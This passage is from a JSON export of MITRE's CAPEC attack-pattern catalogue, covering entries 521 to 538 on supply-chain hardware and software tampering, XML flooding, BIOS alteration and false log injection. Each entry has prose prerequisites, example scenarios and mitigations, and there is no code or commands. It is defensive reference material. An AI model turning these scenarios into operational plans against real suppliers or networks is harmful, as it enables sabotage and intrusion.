Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"521":{"ID":"521","Name":"Hardware Design Specifications Are Altered","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to a manufacturer\'s hardware manufacturing process documentation alters the design specifications, which introduces flaws advantageous to the attacker once the system is deployed.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447"}},"Prerequisites":{"Prerequisite":["Advanced knowledge of hardware capabilities of a manufacturer\'s product.","Access to the manufacturer\'s documentation."]},"Skills_Required":{"Skill":["Ability to read, interpret, and subsequently alter manufacturer\'s documentation to cause errors in design specifications.",{"Level":"High"},"Ability to stealthly gain access via remote compromise or physical access to the manufacturer\'s documentation.",{"Level":"High"}]},"Example_Instances":{"Example":"To operate at full capability, a manufacturer\'s network intrusion detection device needs to have either a Intel Xeon E7-2820 or AMD FX-8350 which have 8 \\"cores\\" available, allowing for advanced threading needed to handle large volumes of network traffic without resorting to dropping packets from the detection process. The attacker alters the documentation to state that the system design must use the Intel Core Duo or the AMD Phenom II X2, which only have 2 cores, causing the system to drop large amounts of packets during deployment at a victim site with large amounts of network traffic."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"}}},"522":{"ID":"522","Name":"Malicious Hardware Component Replacement","Abstraction":"Standard","Status":"Draft","Description":"An attacker replaces legitimate hardware in the system with faulty counterfeit or tampered hardware in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"439"}},"Prerequisites":{"Prerequisite":"Physical access to the system after it has left the manufacturer but before it is deployed at the victim location."},"Skills_Required":{"Skill":["Advanced knowledge of the design of the system.",{"Level":"High"},"Hardware creation and manufacture of replacement components.",{"Level":"High"}]},"Mitigations":{"Mitigation":["Ensure that all contractors and sub-suppliers use trusted means of shipping (e.g., bonded/cleared/vetted and insured couriers) to ensure that components, once purchased, are not subject to compromise during their delivery.","Prevent or detect tampering with critical hardware or firmware components while in transit through use of state-of-the-art anti-tamper devices.","Use tamper-resistant and tamper-evident packaging when shipping critical components (e.g., plastic coating for circuit boards, tamper tape, paint, sensors, and/or seals for cases and containers) and inspect received system components for evidence of tampering."]},"Example_Instances":{"Example":"During shipment the attacker is able to intercept a system that has been purchased by the victim, and replaces a math processor card that functions just like the original, but contains advanced malicious capability. Once deployed, the system functions as normal, but allows for the attacker to remotely communicate with the system and use it as a conduit for additional compromise within the victim\'s environment."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Mitigations"}]}},"523":{"ID":"523","Name":"Malicious Software Implanted","Abstraction":"Standard","Status":"Draft","Description":"An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"439","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"Physical access to the system after it has left the manufacturer but before it is deployed at the victim location."},"Skills_Required":{"Skill":["Advanced knowledge of the design of the system and it\'s operating system components and subcomponents.",{"Level":"High"},"Malicious software creation.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker has created a piece of malicious software designed to function as a backdoor in a system that is to be deployed at the victim location. During shipment of the system, the attacker has physical access to the system at a loading dock of an integrator for a short time. The attacker unpacks and powers up the system and installs the malicious piece of software, and configures it to run upon system boot. The system is repackaged and returned to its place on the loading dock, and is shipped and installed at the victim location with the malicious software in place, allowing the attacker to bypass firewalls and remotely gain access to the victim\'s network for further malicious activities."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"524":{"ID":"524","Name":"Rogue Integration Procedures","Abstraction":"Standard","Status":"Draft","Description":"An attacker alters or establishes rogue processes in an integration facility in order to insert maliciously altered components into the system. The attacker would then supply the malicious components. This would allow for malicious disruption or additional compromise when the system is deployed.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"439","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"Physical access to an integration facility that prepares the system before it is deployed at the victim location."},"Skills_Required":{"Skill":["Advanced knowledge of the design of the system.",{"Level":"High"},"Hardware creation and manufacture of replacement components.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker gains access to a system integrator\'s documentation for the preparation of purchased systems designated for deployment at the victim\'s location. As a part of the preparation, the included 100 megabit network card is to be replaced with a 1 gigabit network card. The documentation is altered to reflect the type of 1 gigabit network card to use, and the attacker ensures that this type of network card is provided by the attacker\'s own supply. The card has additional malicious functionality which will allow for additional compromise by the attacker at the victim location once the system is deployed."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"528":{"ID":"528","Name":"XML Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using XML messages with the intent to deny legitimate users access to a web service. These attacks are accomplished by sending a large number of XML based requests and letting the service attempt to parse each one. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider\'s memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.","Alternate_Terms":{"Alternate_Term":{"Term":"XML Denial of Service (XML DoS)"}},"Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.","Technique":["Use an automated tool to record all instances of URLs to process XML requests.","Use a browser to manually explore the website and analyze how the application processes XML requests."]},{"Step":"2","Phase":"Experiment","Description":"An adversary crafts input data that may have an adverse effect on the operation of the web service when the XML data sent to the service."},{"Step":"3","Phase":"Exploit","Description":"[Launch a resource depletion attack] The attacker delivers a large number of XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.","Technique":"Send a large number of crafted XML messages to the target URL."}]},"Prerequisites":{"Prerequisite":["The target must receive and process XML transactions.","An adverssary must possess the ability to generate a large amount of XML based messages to send to the target service."]},"Skills_Required":{"Skill":["Denial of service",{"Level":"Low"}]},"Indicators":{"Indicator":"A large amount of data is passed to the XML parser possibly making it crash or otherwise unavailable to end users."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption"}},"Mitigations":{"Mitigation":["Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.","Implementation: Provide for network flow control and traffic shaping to control access to the resources."]},"Example_Instances":{"Example":"Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.002","Entry_Name":"Endpoint Denial of Service:Service Exhaustion Flood"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, Related_Attack_Patterns, Skills_Required, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"529":{"ID":"529","Name":"Malware-Directed Internal Reconnaissance","Abstraction":"Standard","Status":"Stable","Description":"Adversary uses malware or a similarly controlled application installed inside an organizational perimeter to gather information about the composition, configuration, and security mechanisms of a targeted application, system or network.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have internal, logical access to the target network and system."},"Skills_Required":{"Skill":["The adversary must be able to obtain or develop, as well as place malicious software inside the target network/system.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The adversary requires a variety of tools to collect information about the target. These include port/network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Keep patches up to date by installing weekly or daily if possible.","Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}]}},"530":{"ID":"530","Name":"Provide Counterfeit Component","Abstraction":"Detailed","Status":"Draft","Description":"An attacker provides a counterfeit component during the procurement process of a lower-tier component supplier to a sub-system developer or integrator, which is then built into the system being upgraded or repaired by the victim, allowing the attacker to cause disruption or additional compromise.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"531"}},"Prerequisites":{"Prerequisite":"Advanced knowledge about the target system and sub-components."},"Skills_Required":{"Skill":["Able to develop and manufacture malicious system components that resemble legitimate name-brand components.",{"Level":"High"}]},"Example_Instances":{"Example":"The attacker, aware that the victim has contracted with an integrator for system maintenance and that the integrator uses commercial-off-the-shelf network hubs, develops their own network hubs with a built-in malicious capability for remote access, the malicious network hubs appear to be a well-known brand of network hub but are not. The attacker then advertises to the sub-system integrator that they are a legit supplier of network hubs, and offers them at a reduced price to entice the integrator to purchase these network hubs. The integrator then installs the attacker\'s hubs at the victim\'s location, allowing the attacker to remotely compromise the victim\'s network."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Counterfeit Component Supplied",{"Date":"2015-11-09"}]}},"531":{"ID":"531","Name":"Hardware Component Substitution","Abstraction":"Detailed","Status":"Draft","Description":"An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"534"}},"Prerequisites":{"Prerequisite":"Physical access to the system or the integration facility where hardware components are kept."},"Skills_Required":{"Skill":["Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker has access to an organization\'s warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim\'s security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim\'s location for further malicious activity."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Hardware Component Substitution After Installation",{"Date":"2015-11-09"}]}},"532":{"ID":"532","Name":"Altered Installed BIOS","Abstraction":"Detailed","Status":"Stable","Description":"An attacker with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":["Advanced knowledge about the installed target system design.","Advanced knowledge about the download and update installation processes.","Access to the download and update system(s) used to deliver BIOS images."]},"Skills_Required":{"Skill":["Able to develop a malicious BIOS image with the original functionality as a normal BIOS image, but with added functionality that allows for later compromise and/or disruption.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker compromises the download and update portion of a manufacturer\'s web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem\'s security checks. The malicious BIOS is put in place on the manufacturer\'s website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim\'s system, which allows for additional compromise by the attacker."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1542.001","Entry_Name":"Pre-OS Boot:System Firmware"}},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Altered BIOS Installed After Installation",{"Date":"2015-11-09"}]}},"533":{"ID":"533","Name":"Malicious Manual Software Update","Abstraction":"Detailed","Status":"Draft","Description":"An attacker introduces malicious code to the victim\'s system by altering the payload of a software update, allowing for additional compromise or site disruption at the victim location. These manual, or user-assisted attacks, vary from requiring the user to download and run an executable, to as streamlined as tricking the user to click a URL. Attacks which aim at penetrating a specific network infrastructure often rely upon secondary attack methods to achieve the desired impact. Spamming, for example, is a common method employed as an secondary attack vector. Thus the attacker has in their arsenal a choice of initial attack vectors ranging from traditional SMTP/POP/IMAP spamming and its varieties, to web-application mechanisms which commonly implement both chat and rich HTML messaging within the user interface.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"186"}},"Prerequisites":{"Prerequisite":["Advanced knowledge about the download and update installation processes.","Advanced knowledge about the deployed system and its various software subcomponents and processes."]},"Skills_Required":{"Skill":["Able to develop malicious code that can be used on the victim\'s system while maintaining normal functionality.",{"Level":"High"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, References, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"}],"Previous_Entry_Name":["Malicious Software Update",{"Date":"2015-11-09"}]}},"534":{"ID":"534","Name":"Malicious Hardware Update","Abstraction":"Standard","Status":"Stable","Description":"An adversary introduces malicious hardware during an update or replacement procedure, allowing for additional compromise or site disruption at the victim location. After deployment, it is not uncommon for upgrades and replacements to occur involving hardware and various replaceable parts. These upgrades and replacements are intended to correct defects, provide additional features, and to replace broken or worn-out parts. However, by forcing or tricking the replacement of a good component with a defective or corrupted component, an adversary can leverage known defects to obtain a desired malicious impact.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"440"}},"Skills_Required":{"Skill":["Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts.",{"Level":"High"}]},"Example_Instances":{"Example":"An adversary develops a malicious networking card that allows for normal function plus the addition of malicious functionality that is of benefit to the adversary. The adversary sends the victim an email stating that the existing networking card is faulty, and that the victim can order a replacement card free of charge. The victim orders the card, and the adversary sends the malicious networking card. The malicious networking card replaces the perfectly-functioning original networking card, and the adversary is able to take advantage of the additional malicious functionality to further compromise the victim\'s network."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances"}]}},"535":{"ID":"535","Name":"Malicious Gray Market Hardware","Abstraction":"Detailed","Status":"Draft","Description":"An attacker maliciously alters hardware components that will be sold on the gray market, allowing for victim disruption and compromise when the victim needs replacement hardware components for systems where the parts are no longer in regular supply from original suppliers, or where the hardware components from the attacker seems to be a great benefit from a cost perspective.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"531"}},"Prerequisites":{"Prerequisite":"Physical access to a gray market reseller\'s hardware components supply, or the ability to appear as a gray market reseller to the victim\'s buyer."},"Skills_Required":{"Skill":["Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker develops co-processor boards with malicious capabilities that are technically the same as a manufacturer\'s expensive upgrade to their flagship system. The victim has installed the manufacturer\'s base system without the expensive upgrade. The attacker contacts the victim and states they have the co-processor boards at a drastically-reduced price, falsely stating they were acquired from a bankruptcy liquidation of a company that had purchased them from the manufacturer. The victim after hearing the drastically reduced price decides to take advantage of the situation and purchases the upgrades from the attacker, and installs them. This allows the attacker to further compromise the victim."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Examples-Instances, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"}}},"536":{"ID":"536","Name":"Data Injected During Configuration","Abstraction":"Standard","Status":"Stable","Description":"An attacker with access to data files and processes on a victim\'s system injects malicious data into critical operational data during configuration or recalibration, causing the victim\'s system to perform in a suboptimal manner that benefits the adversary.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"176","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine configuration process] The adversary, through a previously compromised system, either remotely or physically, determines what the configuration process is. They look at configuration files, data files, and running processes on the system to identify areas where they could inject malicious data."},{"Step":"2","Phase":"Explore","Description":"[Determine when configuration occurs] The adversary needs to then determine when configuration or recalibration of a system occurs so they know when to inject malicious data.","Technique":["Look for a weekly update cycle or repeated update schedule.","Insert a malicious process into the target system that notifies the adversary when configuration is occurring."]},{"Step":"3","Phase":"Experiment","Description":"[Determine malicious data to inject] By looking at the configuration process, the adversary needs to determine what malicious data they want to insert and where to insert it.","Technique":["Add false log data","Change configuration files","Change data files"]},{"Step":"4","Phase":"Exploit","Description":"[Inject malicious data] Right before, or during system configuration, the adversary injects the malicious data. This leads to the system behaving in a way that is beneficial to the adversary and is often followed by other attacks."}]},"Prerequisites":{"Prerequisite":["The attacker must have previously compromised the victim\'s systems or have physical access to the victim\'s systems.","Advanced knowledge of software and hardware capabilities of a manufacturer\'s product."]},"Skills_Required":{"Skill":["Ability to generate and inject false data into operational data into a system with the intent of causing the victim to alter the configuration of the system.",{"Level":"High"}]},"Mitigations":{"Mitigation":"Ensure that proper access control is implemented on all systems to prevent unauthorized access to system files and processes."},"Example_Instances":{"Example":"An adversary wishes to bypass a security system to access an additional network segment where critical data is kept. The adversary knows that some configurations of the security system will allow for remote bypass under certain conditions, such as switching a specific parameter to a different value. The adversary knows the bypass will work but also will be detected within the logging data of the security system. The adversary waits until an upgrade is performed to the security system by the victim\'s system administrators, and the adversary has access to an external logging system. The adversary injects false log entries that cause the administrators to think there are two different error states within the security system - one involving the specific parameter and the other involving the logging entries. The specific parameter is adjusted to a different value, and the logging level is reduced to a lower level that will not cause an adversary bypass to be detected. The adversary stops injecting false log data, and the administrators of the security system believe the issues were caused by the upgrade and are now resolved. The adversary is then able to bypass the security system."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Examples-Instances, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"537":{"ID":"537","Name":"Infiltration of Hardware Development Environment","Abstraction":"Detailed","Status":"Draft","Description":"An attacker, leveraging the ability to manipulate components of primary support systems and tools within the development and production environments, inserts malicious software within the hardware and/or firmware development environment. The infiltration purpose is to alter developed hardware components in a system destined for deployment at the victim\'s organization, for the purpose of disruption or further compromise.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":["The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).","The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.","The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure."]},"Skills_Required":{"Skill":["Intelligence about the manufacturer\'s operating environment and infrastructure.",{"Level":"Medium"},"Ability to develop, deploy, and maintain a stealth malicious backdoor program remotely in what is essentially a hostile environment.",{"Level":"High"},"Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)",{"Level":"High"}]},"Example_Instances":{"Example":"The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for hardware and/or firmware design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent hardware development system from the manufacturer\'s workstation. The attacker is then able to exfiltrate and alter sensitive data on the hardware system, allowing for future compromise once the developed system is deployed at the victim location."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}]}},"538":{"ID":"538","Name":"Open-Source Library Manipulation","Abstraction":"Detailed","Status":"Stable","Description":"Adversaries implant malicious code in open source software (OSS) libraries to have it widely distributed, as OSS is commonly downloaded by developers and other users to incorporate into software development projects. The adversary can have a particular system in mind to target, or the implantation can be the first stage of follow-on attacks on many systems.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":[{"Exclude_ID":"437"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":["[Determine the relevant open-source code project to target] The adversary will make the selection based on various 